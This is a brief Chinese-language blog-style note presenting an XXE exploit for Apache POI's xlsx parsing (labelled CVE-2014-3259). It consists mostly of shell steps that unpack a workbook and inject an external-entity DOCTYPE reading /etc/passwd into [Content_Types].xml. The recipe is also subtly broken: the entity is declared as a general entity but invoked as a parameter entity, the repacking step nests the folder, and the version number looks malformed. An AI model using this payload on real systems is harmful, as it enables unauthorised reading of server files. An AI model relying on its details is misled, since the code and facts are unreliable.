【笔记】CVE-2014-3259漏洞利用
前言
针对于xlsx文件的XXE外部实体攻击
漏洞利用前提
- poi-ooxml.jar <= 3.1.0
漏洞利用
- 修改文件
.xlsx
后缀名为.zip
1 | mv x.xlsx x.zip |
- 解压
1 | unzip x.zip -d x |
- 替换
[Content_Types].xml
文件的内容
1 | echo '<?xml version="1.0"?><!DOCTYPE example [<!ENTITY file SYSTEM "file:///etc/passwd">%file;]>' > x/[Content_Types].xml |
- 重新打包为
.zip
文件
1 | zip -r x.zip x |
- 修改文件
.zip
后缀名为.xlsx
1 | mv x.zip x.xlsx |